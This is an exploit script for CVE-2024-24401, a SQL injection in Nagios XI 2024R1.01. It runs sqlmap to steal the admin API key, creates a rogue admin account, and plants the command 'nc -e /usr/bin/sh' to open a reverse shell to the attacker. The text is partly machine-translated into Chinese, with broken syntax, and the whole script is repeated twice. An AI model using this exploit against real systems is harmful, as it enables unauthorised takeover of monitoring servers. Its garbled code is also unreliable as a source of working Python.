#利用标题: Nagios xi sqli
#Google Dork: [如果适用,]
#date: 02/26/2024
#漏洞作者: JAROD JASLOW(MAWK)https://www.linkedin.com/in/jarod-jaslow-jaslow-codename-mawk-2651444201/
#供应商homepage: https://www.nagios.com/changelog/#nagios-xi
#软件link: https://github.com/mawk0235/cve-2024-24401
#版本: NAGIOS XI版本2024R1.01
#在: NAGIOS XI版本2024R1.01 Linux测试
#cve : https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2024-24401
#
导入请求
导入子过程
导入argparse
导入
导入urllib3
导入操作系统
导入随机
导入字符串
从Colorama进口,风格
urllib3.disable_warnings(urllib3.exceptions.insecurreequestwarning)
DEF SERVICELOGIN(用户,密码):
r=requests.post(f'http://{ip}/nagiosxi/api/v1/authenticate?pretty=1',data={'username':user,'password'
assword,'valif_min':'5'},'
打印(f'{fore.magenta} [+]用被捕获的信用对API进行身份验证........
match=re.search(r'auth_token':'(。*)'',r.text)
如果Match:
token=match.group(1)
print(f'{fore.magenta} [ +] token:' +令牌)
r=requests.get(f'http://{ip}/nagiosxi/login.php?token={token}',verify=false)
cookie=r.headers ['set-cookie']
cookie=cookie.split(',')[0]
match=re.search(r'nagiosxi=(。*);',cookie)
cookie=match.group(1)
print(f'{fore.magenta} [ +] auth cookie is:' + cookie)
返回饼干
其他:
print(f'{fore.red} [ - ]身份验证失败. {style.Reset_all}')
出口()
DEF SQLMAP(IP,用户名,密码):
print(f'{fore.magenta} [+]启动sqlmap .')
session=requests.session()
s=session.get(f'http://{ip}/nagiosxi/index.php',verify=false)
match=re.search(r'var nsp_str=\'(。*?)\'',s.text)
nsp=match.group(1)
print(f'{fore.magenta} [ +] nsp捕获:' + nsp)
data={'nsp': nsp,'page':'auth','debug':'','pageopt':'login','username':用户名,'
s=session.post(f'http://{ip}/nagiosxi/login.php',data=data)
打印(f'{fore.magenta} [+]被认证为用户。')
打印(f'{fore.magenta} [+]接受许可协议.')
s=session.get(f'http://{ip}/nagiosxi/login.php?showlicense',verify=false)
match=re.search(r'var nsp_str=\'(。*?)\'',s.text)
nsp=match.group(1)
data={'page':'/nagiosxi/login.php','pageopt':'sunselicense','nsp': nsp,'clable_license':'on'}}
session.post(f'http://{ip}/nagiosxi/login.php?showlicense',data=data)
打印(f'{fore.magenta} [+]执行强制性密码更改argh')
newpass='mawk'
data={'page':'/nagiosxi/login.php','pageopt':'tragepass','nsp': nsp,'current_pass_password':密码,'password1': newpass,newpass,'
session.post(f'http://{ip}/nagiosxi/login.php?forcepasswordchange',data=data)
s=session.get(f'http://{ip}/nagiosxi/')
match=re.search(r'var nsp_str=\'(。*?)\'',s.text)
nsp=match.group(1)
cookie=s.cookies.get('nagiosxi')
sqlmap_command=f'sqlmap -flush -session -u'http://{ip}/nagiosxi//config/config/monitoringwizard.php/1*? nagiosxi -t xi_users -drop -set -cookie -technique=et -dbms=mysql -p id -p id----------- level=5 -threads=10 -batch'
#print(sqlmap_command)
sqlmap_command_output=subprocess.popen(sqlmap_command,shell=true,stdout=subprocess.pipe.pipe,stderr=subprocess.pipe.pipe,text=true)
TRY:
对于iter中的行(sqlmap_command_output.stdout.readline,''):
如果'| Nagios管理员|'在Line:中
match=re.search(r'nagios管理员\ |(。*?)\ |',line)
如果Match:
AdminKey=match.group(1)
print(f'{fore.magenta} [ +] admin键恢复:' + adminkey)
返回管理
其他:
print(f'{fore.red} [ - ]无法拉动admin键:(. {style.Reset_all}')
出口()
休息
打印('[ - ] sqlmap捕获失败.')
sqlmap_command_output.terminate()
除了键盘Interrupt:
打印(f'{fore.red} [ - ] sqlmap中断。清理. {style.reset_all}')
sqlmap_command_output.terminate()
sqlmap_command_output.communate()
出口()
Def createAdmin(IP,Adminkey):
字符=string.ascii_letters + string.digits
randy_username=''.join(randy.choice(conse)f for range(5))
rando_password=''.join(random.choice(conse)f for Range(5))
data={'username': random_username,'password': Random_password,'name': Random_username,'email': f': f'{random_username }@mail} @mail} @mail} @mail.com','auth_level':'admin'}
r=requests.post(f'http://{ip}/nagiosxi/api/v1/v1/system/user?apikey={adminkey} pretty=1',data=data=data,verify=false)
如果R.Text:中的“成功”
print(f'{fore.magenta} [+] admin帐户创建.')
返回Random_Username,Random_Password
其他:
print(f'{fore.red} [ - ]帐户创建失败!(. {style.Reset_all}')
印刷(R.Text)
出口()
def start_http_server():
subprocess.popen([['python','-m','http.server','8000'],stdout=subprocess.pipe.pipe,stderr=subprocess.pipe)
def Adminexploit(Adminusername,AdminPassword,IP,LHOST,LPORT):
打印(f'{fore.magenta} [+]进行强制性密码更改.')
session=requests.session()
s=session.get(f'http://{ip}/nagiosxi/index.php',verify=false)
match=re.search(r'var nsp_str=\'(。*?)\'',s.text)
nsp=match.group(1)
print(f'{fore.magenta} [ +] nsp捕获:' + nsp)
data={'nsp': nsp,'page':'auth','debug':'','pageopt':'login','userName': adminusername,'password':
s=session.post(f'http://{ip}/nagiosxi/login.php',data=data)
print(f'{fore.magenta} [+]被认证为admin .')
打印(f'{fore.magenta} [+]接受许可协议.')
s=session.get(f'http://{ip}/nagiosxi/login.php?showlicense',verify=false)
match=re.search(r'var nsp_str=\'(。*?)\'',s.text)
nsp=match.group(1)
data={'page':'/nagiosxi/login.php','pageopt':'sunselicense','nsp': nsp,'clable_license':'on'}}
session.post(f'http://{ip}/nagiosxi/login.php?showlicense',data=data)
打印(f'{fore.magenta} [+]执行强制性密码更改argh')
newAdminpass=adminusEnmame + adminPassword
data={'page':'/nagiosxi/login.php','pageopt':'trakePass','current_pass_pass_password': adminpassword,'nsp': nsp,'newadminpass1': newadminpass ''}}
session.post(f'http://{ip}/nagiosxi/login.php?forcepasswordchange',data=data)
print(f'{fore.magenta} [+]创建新命令.')
data={'tfName': adminUsername, 'tfCommand': f'nc -e /usr/bin/sh {LHOST} {LPORT}', 'selCommandType': '1', 'chbActive': '1', 'cmd': 'submit', 'mode': '插入','hidid':'0','Hidname':'','HidServIceDescription':':'','hostaddress':'127.0.0.0.0.0.0.0.1','extctipe':
session.post(f'http://{ip}/nagiosxi/includes/components/ccm/index.php?type=commandPage=1',data=data)
data={'cmd':'','继续':'}
start_http_server()
print(f'{fore.magenta} [ +]创建command:' + adminusErname)
session.post(f'http://{ip}/nagiosxi/includes/components/nagioscorecfg/applyconfig.php?cmd=confirm',data=data)
data={'search': adminusErname}
s=session.post(f'http://{ip}/nagiosxi/includes/components/ccm/index.php?cmd=viewtype=commandPage=1',data=data)
match=re.search(r'javascript:Actionpic \('deactivate','(。*?)',',s.text)
如果Match:
commandcid=match.group(1)
print(f'{fore.magenta} [ +]捕获的命令cid:' + commandcid)
s=session.get(f'http://{ip}/nagiosxi/inclate/components/ccm/?cmd=viewType=service')
match=re.search(r'var nsp_str=\'(。*?)\'',s.text)
如果Match:
nsp=match.group(1)
s=session.get(f'http://{ip}/nagiosxi/includes/components/ccm/command_test.php?cmd=testmode=testcid={commandCID}
OS.System('Kill -9 $(LSOF -T -I:8000)')
打印(f'{fore.red} [+]检查您的听众')
其他:
打印(f'{fore.red} [ - ]错误')
其他:
print(f'{fore.red} [ - ]无法捕获命令cid . {style.Reset_all}')
如果name=='__ -Main __':
ascii_art=f''''{fore.lightred_ex}
███╗███╗█████╗██╗██╗██╗███████╗██████╗██████╗██╗██████╗
███████████████╔═════════════════════════════════════════════════════════╝
██╔████╔██║███████║██║█╗██║█████╔╝███████╗██║██████╔╝██║██████╔╝██║
██║╚██╔╝███╔═══████║███╖╖██╔══███╖╖╖██╖════███║╖║╖║╖║╖
██║██║██║╚███╔███╔╝██║██╗███████║╚██████╗██║██║██║██║███████║
╚═╝╚═╝╚══╝╚══╝╚═╝╚══════╝╚═════╝╚═╝╚═════╝╚═╝╚═╝╚═╝╚═╝
{style.Reset_all}
'''
打印(ASCII_ART)
parser=argparse.argumentparser(description='autopwn for Bizness htb Machine',用法='sudo nagios.py target ip lhost lport')
parser.add_argument('ip',help='target ip')
parser.add_argument('lhost',help='local主机')
parser.add_argument('lport',help='听力端口')
args=parser.parse_args()
min_required_args=3
如果len(vars(args))!=min_required_args:
parser.print_usage()
出口()
adminusername,adminPassword=createAdmin(args.ip,sqlmap(args.ip,intput(f'{fore.magenta} [+)
print(f'{fore.magenta} [ +] admin username=' + adminusername)
打印(f'{fore.magenta} [ +]管理员密码=' + AdminPassword)
AndineXploit(Adminusername,AdminPassword,args.ip,args.lhost,args.lport)
#Google Dork: [如果适用,]
#date: 02/26/2024
#漏洞作者: JAROD JASLOW(MAWK)https://www.linkedin.com/in/jarod-jaslow-jaslow-codename-mawk-2651444201/
#供应商homepage: https://www.nagios.com/changelog/#nagios-xi
#软件link: https://github.com/mawk0235/cve-2024-24401
#版本: NAGIOS XI版本2024R1.01
#在: NAGIOS XI版本2024R1.01 Linux测试
#cve : https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2024-24401
#
导入请求
导入子过程
导入argparse
导入
导入urllib3
导入操作系统
导入随机
导入字符串
从Colorama进口,风格
urllib3.disable_warnings(urllib3.exceptions.insecurreequestwarning)
DEF SERVICELOGIN(用户,密码):
r=requests.post(f'http://{ip}/nagiosxi/api/v1/authenticate?pretty=1',data={'username':user,'password'
assword,'valif_min':'5'},'打印(f'{fore.magenta} [+]用被捕获的信用对API进行身份验证........
match=re.search(r'auth_token':'(。*)'',r.text)
如果Match:
token=match.group(1)
print(f'{fore.magenta} [ +] token:' +令牌)
r=requests.get(f'http://{ip}/nagiosxi/login.php?token={token}',verify=false)
cookie=r.headers ['set-cookie']
cookie=cookie.split(',')[0]
match=re.search(r'nagiosxi=(。*);',cookie)
cookie=match.group(1)
print(f'{fore.magenta} [ +] auth cookie is:' + cookie)
返回饼干
其他:
print(f'{fore.red} [ - ]身份验证失败. {style.Reset_all}')
出口()
DEF SQLMAP(IP,用户名,密码):
print(f'{fore.magenta} [+]启动sqlmap .')
session=requests.session()
s=session.get(f'http://{ip}/nagiosxi/index.php',verify=false)
match=re.search(r'var nsp_str=\'(。*?)\'',s.text)
nsp=match.group(1)
print(f'{fore.magenta} [ +] nsp捕获:' + nsp)
data={'nsp': nsp,'page':'auth','debug':'','pageopt':'login','username':用户名,'
s=session.post(f'http://{ip}/nagiosxi/login.php',data=data)
打印(f'{fore.magenta} [+]被认证为用户。')
打印(f'{fore.magenta} [+]接受许可协议.')
s=session.get(f'http://{ip}/nagiosxi/login.php?showlicense',verify=false)
match=re.search(r'var nsp_str=\'(。*?)\'',s.text)
nsp=match.group(1)
data={'page':'/nagiosxi/login.php','pageopt':'sunselicense','nsp': nsp,'clable_license':'on'}}
session.post(f'http://{ip}/nagiosxi/login.php?showlicense',data=data)
打印(f'{fore.magenta} [+]执行强制性密码更改argh')
newpass='mawk'
data={'page':'/nagiosxi/login.php','pageopt':'tragepass','nsp': nsp,'current_pass_password':密码,'password1': newpass,newpass,'
session.post(f'http://{ip}/nagiosxi/login.php?forcepasswordchange',data=data)
s=session.get(f'http://{ip}/nagiosxi/')
match=re.search(r'var nsp_str=\'(。*?)\'',s.text)
nsp=match.group(1)
cookie=s.cookies.get('nagiosxi')
sqlmap_command=f'sqlmap -flush -session -u'http://{ip}/nagiosxi//config/config/monitoringwizard.php/1*? nagiosxi -t xi_users -drop -set -cookie -technique=et -dbms=mysql -p id -p id----------- level=5 -threads=10 -batch'
#print(sqlmap_command)
sqlmap_command_output=subprocess.popen(sqlmap_command,shell=true,stdout=subprocess.pipe.pipe,stderr=subprocess.pipe.pipe,text=true)
TRY:
对于iter中的行(sqlmap_command_output.stdout.readline,''):
如果'| Nagios管理员|'在Line:中
match=re.search(r'nagios管理员\ |(。*?)\ |',line)
如果Match:
AdminKey=match.group(1)
print(f'{fore.magenta} [ +] admin键恢复:' + adminkey)
返回管理
其他:
print(f'{fore.red} [ - ]无法拉动admin键:(. {style.Reset_all}')
出口()
休息
打印('[ - ] sqlmap捕获失败.')
sqlmap_command_output.terminate()
除了键盘Interrupt:
打印(f'{fore.red} [ - ] sqlmap中断。清理. {style.reset_all}')
sqlmap_command_output.terminate()
sqlmap_command_output.communate()
出口()
Def createAdmin(IP,Adminkey):
字符=string.ascii_letters + string.digits
randy_username=''.join(randy.choice(conse)f for range(5))
rando_password=''.join(random.choice(conse)f for Range(5))
data={'username': random_username,'password': Random_password,'name': Random_username,'email': f': f'{random_username }@mail} @mail} @mail} @mail.com','auth_level':'admin'}
r=requests.post(f'http://{ip}/nagiosxi/api/v1/v1/system/user?apikey={adminkey} pretty=1',data=data=data,verify=false)
如果R.Text:中的“成功”
print(f'{fore.magenta} [+] admin帐户创建.')
返回Random_Username,Random_Password
其他:
print(f'{fore.red} [ - ]帐户创建失败!(. {style.Reset_all}')
印刷(R.Text)
出口()
def start_http_server():
subprocess.popen([['python','-m','http.server','8000'],stdout=subprocess.pipe.pipe,stderr=subprocess.pipe)
def Adminexploit(Adminusername,AdminPassword,IP,LHOST,LPORT):
打印(f'{fore.magenta} [+]进行强制性密码更改.')
session=requests.session()
s=session.get(f'http://{ip}/nagiosxi/index.php',verify=false)
match=re.search(r'var nsp_str=\'(。*?)\'',s.text)
nsp=match.group(1)
print(f'{fore.magenta} [ +] nsp捕获:' + nsp)
data={'nsp': nsp,'page':'auth','debug':'','pageopt':'login','userName': adminusername,'password':
s=session.post(f'http://{ip}/nagiosxi/login.php',data=data)
print(f'{fore.magenta} [+]被认证为admin .')
打印(f'{fore.magenta} [+]接受许可协议.')
s=session.get(f'http://{ip}/nagiosxi/login.php?showlicense',verify=false)
match=re.search(r'var nsp_str=\'(。*?)\'',s.text)
nsp=match.group(1)
data={'page':'/nagiosxi/login.php','pageopt':'sunselicense','nsp': nsp,'clable_license':'on'}}
session.post(f'http://{ip}/nagiosxi/login.php?showlicense',data=data)
打印(f'{fore.magenta} [+]执行强制性密码更改argh')
newAdminpass=adminusEnmame + adminPassword
data={'page':'/nagiosxi/login.php','pageopt':'trakePass','current_pass_pass_password': adminpassword,'nsp': nsp,'newadminpass1': newadminpass ''}}
session.post(f'http://{ip}/nagiosxi/login.php?forcepasswordchange',data=data)
print(f'{fore.magenta} [+]创建新命令.')
data={'tfName': adminUsername, 'tfCommand': f'nc -e /usr/bin/sh {LHOST} {LPORT}', 'selCommandType': '1', 'chbActive': '1', 'cmd': 'submit', 'mode': '插入','hidid':'0','Hidname':'','HidServIceDescription':':'','hostaddress':'127.0.0.0.0.0.0.0.1','extctipe':
session.post(f'http://{ip}/nagiosxi/includes/components/ccm/index.php?type=commandPage=1',data=data)
data={'cmd':'','继续':'}
start_http_server()
print(f'{fore.magenta} [ +]创建command:' + adminusErname)
session.post(f'http://{ip}/nagiosxi/includes/components/nagioscorecfg/applyconfig.php?cmd=confirm',data=data)
data={'search': adminusErname}
s=session.post(f'http://{ip}/nagiosxi/includes/components/ccm/index.php?cmd=viewtype=commandPage=1',data=data)
match=re.search(r'javascript:Actionpic \('deactivate','(。*?)',',s.text)
如果Match:
commandcid=match.group(1)
print(f'{fore.magenta} [ +]捕获的命令cid:' + commandcid)
s=session.get(f'http://{ip}/nagiosxi/inclate/components/ccm/?cmd=viewType=service')
match=re.search(r'var nsp_str=\'(。*?)\'',s.text)
如果Match:
nsp=match.group(1)
s=session.get(f'http://{ip}/nagiosxi/includes/components/ccm/command_test.php?cmd=testmode=testcid={commandCID}
OS.System('Kill -9 $(LSOF -T -I:8000)')
打印(f'{fore.red} [+]检查您的听众')
其他:
打印(f'{fore.red} [ - ]错误')
其他:
print(f'{fore.red} [ - ]无法捕获命令cid . {style.Reset_all}')
如果name=='__ -Main __':
ascii_art=f''''{fore.lightred_ex}
███╗███╗█████╗██╗██╗██╗███████╗██████╗██████╗██╗██████╗
███████████████╔═════════════════════════════════════════════════════════╝
██╔████╔██║███████║██║█╗██║█████╔╝███████╗██║██████╔╝██║██████╔╝██║
██║╚██╔╝███╔═══████║███╖╖██╔══███╖╖╖██╖════███║╖║╖║╖║╖
██║██║██║╚███╔███╔╝██║██╗███████║╚██████╗██║██║██║██║███████║
╚═╝╚═╝╚══╝╚══╝╚═╝╚══════╝╚═════╝╚═╝╚═════╝╚═╝╚═╝╚═╝╚═╝
{style.Reset_all}
'''
打印(ASCII_ART)
parser=argparse.argumentparser(description='autopwn for Bizness htb Machine',用法='sudo nagios.py target ip lhost lport')
parser.add_argument('ip',help='target ip')
parser.add_argument('lhost',help='local主机')
parser.add_argument('lport',help='听力端口')
args=parser.parse_args()
min_required_args=3
如果len(vars(args))!=min_required_args:
parser.print_usage()
出口()
adminusername,adminPassword=createAdmin(args.ip,sqlmap(args.ip,intput(f'{fore.magenta} [+)
print(f'{fore.magenta} [ +] admin username=' + adminusername)
打印(f'{fore.magenta} [ +]管理员密码=' + AdminPassword)
AndineXploit(Adminusername,AdminPassword,args.ip,args.lhost,args.lport)